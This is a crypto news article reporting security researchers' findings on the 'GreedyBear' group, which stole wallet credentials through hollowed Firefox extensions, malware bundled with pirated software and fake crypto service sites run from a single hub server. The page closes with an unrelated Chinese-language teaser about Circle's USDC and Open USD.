Crypto Thieves Dubbed ‘GreedyBear’ Run Industrial-Scale Scam – Details

bitcoinist发布于2025-08-10更新于2025-08-10

文章摘要

A cybercrime group called “GreedyBear” has been accused of stealing over $1 million through what researchers say is one of...

Trusted Editorial content, reviewed by leading industry experts and seasoned editors. Ad Disclosure

A cybercrime group called “GreedyBear” has been accused of stealing over $1 million through what researchers say is one of the most wide-reaching crypto theft operations seen in months.

Reports from Koi Security reveal the group is running a coordinated campaign that mixes malicious browser extensions, malware, and scam websites — all under one network.

Extensions Turned Into Wallet-Stealing Tools

Instead of focusing on just one method, GreedyBear has combined several. According to Koi Security researcher Tuval Admoni, the group has deployed more than 650 malicious tools in its latest push.

This marks a sharp rise from its earlier “Foxy Wallet” operation in July, which involved 40 Firefox extensions.

The group’s tactic, called “Extension Hollowing,” starts with publishing clean-looking Firefox add-ons such as video downloaders or link cleaners.

These extensions, released under fresh publisher accounts, collect fake positive reviews to appear trustworthy. Later, they are swapped for malicious versions impersonating wallets like MetaMask, TronLink, Exodus, and Rabby Wallet.

Once installed, they grab credentials from input fields and send them to GreedyBear’s control servers.

Malware Hidden In Pirated Software

Investigators have also tied nearly 500 malicious Windows files to the same group. Many of these belong to well-known malware families such as LummaStealer, ransomware similar to Luca Stealer, and trojans acting as loaders for other harmful programs.

Distribution frequently occurs through Russian-language websites that host cracked or “repacked” software. Targeting those seeking free software, the attackers reach far beyond the crypto community.

Modular malware was also found by Koi Security, in which operators can add or swap functions without deploying completely new files.

Total crypto market cap currently $3.9 trillion. Chart: TradingView

Fake Crypto Services Created To Swipe Data

Based on reports, in addition to the browser attacks and malware, GreedyBear has established fraudulent websites that fake themselves as genuine cryptocurrency solutions.

Some of these are said to offer hardware wallets, and others are fake wallet repair services for devices such as Trezor.

Also on offer are fake wallet apps with good-looking designs that trick users into inputting recovery phrases, private keys, and payment information.

Unlike standard phishing sites that copy exchange login pages, these scam pages look more like product or support portals.

Reports added that some of them remain active and are still collecting sensitive data, while others are on standby for future use.

Investigators found that nearly all domains tied to these operations lead back to a single IP address — 185.208.156.66. This server acts as the campaign’s hub, handling stolen credentials, coordinating ransomware activity, and hosting scam sites.

Featured image from Unsplash, chart from TradingView

Editorial Process for bitcoinist is centered on delivering thoroughly researched, accurate, and unbiased content. We uphold strict sourcing standards, and each page undergoes diligent review by our team of top technology experts and seasoned editors. This process ensures the integrity, relevance, and value of our content for our readers.

Christian, a journalist and editor with leadership roles in Philippine and Canadian media, is fueled by his love for writing and cryptocurrency. Off-screen, he's a cook and cinephile who's constantly intrigued by the size of the universe.

你可能也喜欢

Circle首席执行官Allaire表示,USDC的网络效应将难以被Open USD复制

Circle首席执行官Jeremy Allaire对Open USD稳定币联盟的推出做出回应,为USDC的竞争优势辩护。他认为稳定币的成功取决于长期网络效应,而非费用结构或共享治理模式。 Allaire在社交平台发长文表示,Circle近十年来在流动性、监管审批和开发者基础设施方面的投入,已构建起新进入者难以复制的优势。他比喻稳定币网络更像互联网平台,其价值随更多开发者、企业和金融机构的接入而增长。他列举了USDC通过数千次集成、跨链协议等工具以及全球银行关系与监管合规所巩固的网络效应。 根据Artemis数据,2026年第一季度USDC处理了近30万亿美元链上交易,占美元稳定币总交易量的约80%,USDT占20%,其他所有美元稳定币合计不足0.5%。 Allaire对Open USD提出的免铸造赎回费、共享储备经济和联盟治理等核心主张提出质疑。他认为赎回政策受更广泛市场现实影响,且Circle已将大部分收入分享给分销伙伴,同时保留足够资金持续投资基础设施。他对大型联盟治理模式的创新效率表示怀疑,并透露Circle早期曾尝试类似模式,后发现小型战略合作更为有效。 对于Coinbase参与Open USD的传闻,Allaire强调双方在USDC上的合作“一如既往稳固”,并预计许多Open USD创始成员将继续同时使用USDC。最后,他欢迎Open USD加入稳定币生态,并重申Circle将通过其基础设施产品支持多发行方。

ambcrypto3小时前

Circle首席执行官Allaire表示,USDC的网络效应将难以被Open USD复制

ambcrypto3小时前

交易

现货
活动图片